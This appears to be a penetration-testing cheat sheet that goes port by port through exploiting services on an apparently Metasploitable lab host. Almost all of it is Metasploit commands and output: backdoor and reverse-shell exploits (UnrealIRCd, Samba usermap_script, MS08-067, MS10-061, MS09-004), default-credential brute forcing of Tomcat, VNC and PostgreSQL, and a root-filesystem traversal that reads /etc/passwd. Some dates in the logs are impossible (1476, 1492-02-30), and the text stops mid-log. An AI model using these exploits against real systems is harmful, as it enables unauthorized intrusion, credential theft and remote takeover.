port number – exploits

Rocktastic one billion, one hundred thirty-three million, eight hundred thirty-nine thousand, four hundred sixty-three unique word combinations update https://goo.gl/Uxxv0L

Great social engineering YouTube vid https://youtu.be/is0zRIxBUWA

myexploit vids

http://www.youtube.com/user/myexploit2600

Any questions DM me on Twitter @myexploit2600

port 6667 – Unreal ircd (win/linux)

port 1524 – ingreslock (linux)


port 8180 - tomcat_mgr_login (win/linux)
port 139 - (linux)
port 139/445 - (linux)
port 445 - (linux)
port 135 - msrpc (win)
port 445 - microsoft-ds (win)
port 1433 - ms-sql-s (win)
port 5900 - vnc (win/linux)
port 5432 - postgresql (linux)
port 25 - smtp
port 3306 - mysql (linux)
port 21 - FTP (linux)

exploits bellow tested with backtrack 5r1

———————————————————————————-

port 6667 – Unreal ircd (win/linux)

root@bt:~# nmap -sV -sC -v -p 6667 IP-Address

6667/tcp open irc Unreal ircd
| irc-info: Server: irc.Metasploitable.LAN
| Version: Unreal3.2.8.1. irc.Metasploitable.LAN
| Lservers/Lusers: 0/1
| Uptime: 0 days, 0:04:32
|_Source ident: OK nmap

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > set rhost IP-Address
msf exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 192.168.1.20:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
[*] Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo ahaBucJmQvi2ONTC;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “ahaBucJmQvi2ONTC\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Address:59446) at 2011-02-21 08:39:04 +0100

———————————————————————————-

port 1524 – ingreslock (linux)

1524/tcp open ingreslock?

The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Accessing it is easy:

root@bt# telnet 192.168.1.20 1524
Trying 192.168.1.20…
Connected to 192.168.1.20.
Escape character is ‘^]’.
root@test:/# id
uid=0(root) gid=0(root) groups=0(root)

———————————————————————————-

port 8180 – tomcat_mgr_login (win/linux)

msf auxiliary(tomcat_mgr_login) > use scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set rport 8180
msf auxiliary(tomcat_mgr_login) > set rhosts Remote-IP-Address
msf auxiliary(tomcat_mgr_login) > run

[*] Remote-IP-Address:8180 TOMCAT_MGR – [01/56] – Trying username:’admin’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [01/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [02/56] – Trying username:’manager’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [02/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [03/56] – Trying username:’role1′ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [03/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [04/56] – Trying username:’root’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [04/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [05/56] – Trying username:’tomcat’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [05/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘tomcat’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [06/56] – Trying username:’both’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [06/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [07/56] – Trying username:’j2deployer’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [07/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [08/56] – Trying username:’ovwebusr’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [08/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [09/56] – Trying username:’cxsdk’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [09/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [10/56] – Trying username:’ADMIN’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [10/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [11/56] – Trying username:’xampp’ with password:”
[-] Remote-IP-Address:8180 TOMCAT_MGR – [11/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [12/56] – Trying username:’admin’ with password:’admin’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [12/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [13/56] – Trying username:’manager’ with password:’manager’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [13/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [14/56] – Trying username:’role1′ with password:’role1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [14/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [15/56] – Trying username:’root’ with password:’root’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [15/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’

[*] Remote-IP-Address:8180 TOMCAT_MGR – [16/56] – Trying username:’tomcat’ with password:’tomcat’

[+] http://Remote-IP-Address:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login ‘tomcat’ : ‘tomcat’

[*] Remote-IP-Address:8180 TOMCAT_MGR – [17/56] – Trying username:’both’ with password:’both’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [17/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [18/56] – Trying username:’j2deployer’ with password:’j2deployer’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [18/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘j2deployer’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [19/56] – Trying username:’ovwebusr’ with password:’ovwebusr’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [19/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [20/56] – Trying username:’cxsdk’ with password:’cxsdk’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [20/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [21/56] – Trying username:’ADMIN’ with password:’ADMIN’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [21/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ADMIN’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [22/56] – Trying username:’xampp’ with password:’xampp’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [22/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘xampp’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [23/56] – Trying username:’ovwebusr’ with password:’OvW*busr1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [23/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘ovwebusr’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [24/56] – Trying username:’cxsdk’ with password:’kdsxc’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [24/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘cxsdk’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [25/56] – Trying username:’root’ with password:’owaspbwa’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [25/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [26/56] – Trying username:’admin’ with password:’manager’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [26/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [27/56] – Trying username:’admin’ with password:’role1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [27/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [28/56] – Trying username:’admin’ with password:’root’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [28/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [29/56] – Trying username:’admin’ with password:’tomcat’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [29/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [30/56] – Trying username:’admin’ with password:’s3cret’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [30/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘admin’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [31/56] – Trying username:’manager’ with password:’admin’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [31/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [32/56] – Trying username:’manager’ with password:’role1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [32/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [33/56] – Trying username:’manager’ with password:’root’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [33/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [34/56] – Trying username:’manager’ with password:’tomcat’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [34/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [35/56] – Trying username:’manager’ with password:’s3cret’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [35/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘manager’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [36/56] – Trying username:’role1′ with password:’admin’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [36/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [37/56] – Trying username:’role1′ with password:’manager’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [37/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [38/56] – Trying username:’role1′ with password:’root’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [38/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [39/56] – Trying username:’role1′ with password:’tomcat’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [39/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [40/56] – Trying username:’role1′ with password:’s3cret’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [40/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘role1′
[*] Remote-IP-Address:8180 TOMCAT_MGR – [41/56] – Trying username:’root’ with password:’admin’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [41/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [42/56] – Trying username:’root’ with password:’manager’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [42/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [43/56] – Trying username:’root’ with password:’role1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [43/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [44/56] – Trying username:’root’ with password:’tomcat’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [44/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [45/56] – Trying username:’root’ with password:’s3cret’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [45/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘root’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [46/56] – Trying username:’both’ with password:’admin’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [46/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [47/56] – Trying username:’both’ with password:’manager’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [47/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [48/56] – Trying username:’both’ with password:’role1′
[-] Remote-IP-Address:8180 TOMCAT_MGR – [48/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [49/56] – Trying username:’both’ with password:’root’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [49/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [50/56] – Trying username:’both’ with password:’tomcat’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [50/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Remote-IP-Address:8180 TOMCAT_MGR – [51/56] – Trying username:’both’ with password:’s3cret’
[-] Remote-IP-Address:8180 TOMCAT_MGR – [51/56] – /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ‘both’
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

———————————————————————————-

port 139 – (linux)

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address
Enter root’s password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment
——— ——-
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master
——— ——-
WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server…

[*] Trying to mount writeable share ‘tmp’…

[*] Trying to link ‘rootfs’ to the root filesystem…

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

———————————————————————————-

port 139/445 – (linux)

samba “username map script” command execution

msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set rhost Remote-IP-Addres
msf exploit(usermap_script) > set lhost Local-IP-Address
msf exploit(usermap_script) > set rport 139 or 445 (both will work)
msf exploit(usermap_script) > set payload cmd/unix/reverse

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo AGo0tmuVPzZXPNPw;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “AGo0tmuVPzZXPNPw\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (Local-IP-Address:4444 -> Remote-IP-Addres:51822) at 2012-10-05 14:35:10 +0100

———————————————————————————-

port 445 – (linux)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)

root@bt:# smbclient -L //Remote-IP-Address
Enter root’s password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Sharename Type Comment
——— —- ——-
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

Server Comment
——— ——-
METASPLOITABLE metasploitable server (Samba 3.0.20-Debian)

Workgroup Master
——— ——-
WORKGROUP METASPLOITABLE

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST Remote-IP-Address

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] Connecting to the server…

[*] Trying to mount writeable share ‘tmp’…

[*] Trying to link ‘rootfs’ to the root filesystem…

[*] Now access the following share to browse the root filesystem:

[*] \\192.168.99.131\tmp\rootfs\

msf auxiliary(samba_symlink_traversal) > exit

root@bt:# smbclient //Remote-IP-Address1/tmp

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1624 as /tmp/smbmore.ufiyQf (317.2 KiloBytes/sec) (average 317.2 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

[..]

———————————————————————————-

port 135 – msrpc (win)

msf > use exploit/windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set lhost IP-Address
msf exploit(ms03_026_dcom) > set rhost IP-Address
msf exploit(ms03_026_dcom) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] …
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:IP-Address[135] …
[*] Sending exploit …

———————————————————————————-

port 445 – microsoft-ds (win)

use windows/smb/ms08_067_netapi
set rhost 192.168.0.200
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.1
exploit

[*] Started reverse handler on 192.168.0.1:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 3 – lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (749056 bytes) to 192.168.0.200
[*] Meterpreter session 1 opened (192.168.0.1:4444 -> 192.168.0.200:1472)

Once done you need to open the console by typing the bellow after the >

meterpreter > execute -f cmd.exe -c
Process 1120 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1…

Microsoft Windows XP
(C) Copyright 1985-2001 Microsoft Corp.

myexploit.wordpress.com/control-smb-445-137-139/

And local printer exploit

msf > use exploit/windows/smb/ms10_061_spoolss

msf exploit(ms10_061_spoolss) > info

Name: Microsoft Print Spooler Service Impersonation Vulnerability
Module: exploit/windows/smb/ms10_061_spoolss
Version: 13208
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent

Provided by:
jduck
hdm

Available targets:
Id Name
— —-
0 Windows Universal

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
PNAME no The printer share name to use on the target
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE spoolss no The named pipe for the spooler service

Payload information:
Space: 1024
Avoid: 0 characters

Description:
This module exploits the RPC service impersonation vulnerability
detailed in Microsoft Bulletin MS10-061. By making a specific DCE
RPC request to the StartDocPrinter procedure, an attacker can
impersonate the Printer Spooler service to create a file. The
working directory at the time is %SystemRoot%\system32. An attacker
can specify any file name, including directory traversal or full
paths. By sending WritePrinter requests, an attacker can fully
control the content of the created file. In order to gain code
execution, this module writes to a directory used by Windows
Management Instrumentation (WMI) to deploy applications. This
directory (Wbem\Mof) is periodically scanned and any new .mof files
are processed automatically. This is the same technique employed by
the Stuxnet code found in the wild.

References:
http://www.osvdb.org/67988
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2729
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx

msf exploit(ms10_061_spoolss) > set rhost Remote-IP-Address

msf exploit(ms10_061_spoolss) > exploit

[*] Started reverse handler on Local-IP-Address:4444
[*] Trying target Windows Universal…
[*] Binding to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] …
[*] Bound to 12345678-1234-abcd-EF00-0123456789ab:1.0@ncacn_np:Remote-IP-Address[\spoolss] …
[*] Attempting to exploit MS10-061 via \\IP-Address\PWN-AGFA-Acc …
[*] Printer handle: 000000008493a66b538fa546865d85bb85e8f036
[*] Job started: 0x2
[*] Wrote 73802 bytes to %SystemRoot%\system32\pDeC6njEHgezu5.exe
[*] Job started: 0x3
[*] Wrote 2224 bytes to %SystemRoot%\system32\wbem\mof\9Y3E56ufs7KWqm.mof
[*] Everything should be set, waiting for a session…
[*] Sending stage (752128 bytes) to Remote-IP-Address
[*] Meterpreter session 4 opened (Local-IP-Address:4444 -> Remote-IP-Address:1033) at 1476-12-06 17:24:48 +0000

meterpreter >

———————————————————————————-

port 1433 – ms-sql-s (win)

msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin
msf exploit(ms09_004_sp_replwritetovarbin) > set lhost IP-Address
lhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin) > set rhost IP-Address
rhost => IP-Address
msf exploit(ms09_004_sp_replwritetovarbin) > exploit

[*] Started reverse handler on IP-Address:4444
[*] Attempting automatic target detection…
[*] Automatically detected target “MSSQL 2005 SP0 (9.00.1399.06)”
[*] Redirecting flow to 0x10e860f via call to our faked vtable ptr @ 0x2201ca8
[*] Sending stage (752128 bytes) to IP-Address
[*] Meterpreter session 1 opened (IP-Address:4444 -> IP-Address:1063) at 2012-07-10 15:16:39 +0100

———————————————————————————-

port 5900 – vnc (win/linux)

root@bt:~# nmap -sS -sC -p 5900 IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 1492-02-30 14:25 BST
Nmap scan report for IP-Address
Host is up (0.00054s latency).
PORT STATE SERVICE
5900/tcp open vnc
| vnc-info:
| Protocol version: 3.3
| Security types:
|_ Unknown security type (33554432)
MAC Address: 08:00:27:EB:18:CC (Micky Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary(vnc_login) > set PASS_FILE /opt/metasploit-4.1.4/msf3/data/wordlists/vnc_passwords.txt
msf auxiliary(vnc_login) > set rhosts IP-Address
msf auxiliary(vnc_login) > set BRUTEFORCE_SPEED 3
msf auxiliary(vnc_login) > run

[*] IP-Address:5900 – Starting VNC login sweep
[*] IP-Address:5900 VNC – [01/18] – Attempting VNC login with password ”
[*] IP-Address:5900 VNC – [01/18] – , VNC server protocol version : 3.3
[-] IP-Address:5900 VNC – [01/18] – , Authentication failed
[*] IP-Address:5900 VNC – [02/18] – Attempting VNC login with password ‘password’
[*] IP-Address:5900 VNC – [02/18] – , VNC server protocol version : 3.3
[+] IP-Address:5900, VNC server password : “password”
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

2. Open vncviewer or tsclient

root@bt:~# vncviewer ip-address:5900

root@bt:~# tsclient

Computer = IP-Address
Protocol = VNC
Username = leave blank
Press connect

3. A Password box will open type in password press enter.

port 8180 – tomcat_mgr_login (win/linux)

———————————————————————————-

port 5432 – postgresql (linux)

root@bt:~# nmap -sV -p 22,5432 –open Remote-IP-Address

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-10-05 15:46 BST
Nmap scan report for Remote-IP-Address
Host is up (0.00045s latency).
PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7

MAC Address: 01:02:03:04:05:06 (Micky Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.30 seconds

msf > search PostgreSQL

Matching Modules
================

Name Disclosure Date Rank Description
—- ————— —- ———–
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/admin/postgres/postgres_sql normal PostgreSQL Server Generic Query
auxiliary/scanner/postgres/postgres_login normal PostgreSQL Login Utility
auxiliary/scanner/postgres/postgres_version normal PostgreSQL Version Probe
exploit/windows/postgres/postgres_payload 2009-04-10 00:00:00 UTC excellent PostgreSQL for Microsoft Windows Payload Execution

msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts Remote-IP-Address
msf auxiliary(postgres_login) > exploit

[*] Remote-IP-Address:5432 Postgres – [01/21] – Trying username:’postgres’ with password:” on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘postgres’:”
[-] Remote-IP-Address:5432 Postgres – [01/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [02/21] – Trying username:” with password:” on database ‘template1′
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ”:”
[-] Remote-IP-Address:5432 Postgres – [02/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [03/21] – Trying username:’scott’ with password:” on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:”
[-] Remote-IP-Address:5432 Postgres – [03/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [04/21] – Trying username:’admin’ with password:” on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘admin’:”
[-] Remote-IP-Address:5432 Postgres – [04/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [05/21] – Trying username:’postgres’ with password:’postgres’ on database ‘template1’
[+] Remote-IP-Address:5432 Postgres – Logged in to ‘template1’ with ‘postgres’:’postgres’

[+] Remote-IP-Address:5432 Postgres – Success: postgres:postgres (Database ‘template1′ succeeded.)

[*] Remote-IP-Address:5432 Postgres – Disconnected
[*] Remote-IP-Address:5432 Postgres – [06/21] – Trying username:’scott’ with password:’scott’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘scott’:’scott’
[-] Remote-IP-Address:5432 Postgres – [06/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [07/21] – Trying username:’admin’ with password:’admin’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘admin’:’admin’
[-] Remote-IP-Address:5432 Postgres – [07/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [08/21] – Trying username:’admin’ with password:’password’ on database ‘template1’
[-] Remote-IP-Address:5432 Postgres – Invalid username or password: ‘admin’:’password’
[-] Remote-IP-Address:5432 Postgres – [08/21] – Username/Password failed.
[*] Remote-IP-Address:5432 Postgres – [09/21] – Trying username:” with password:’tiger’ on database ‘template1′
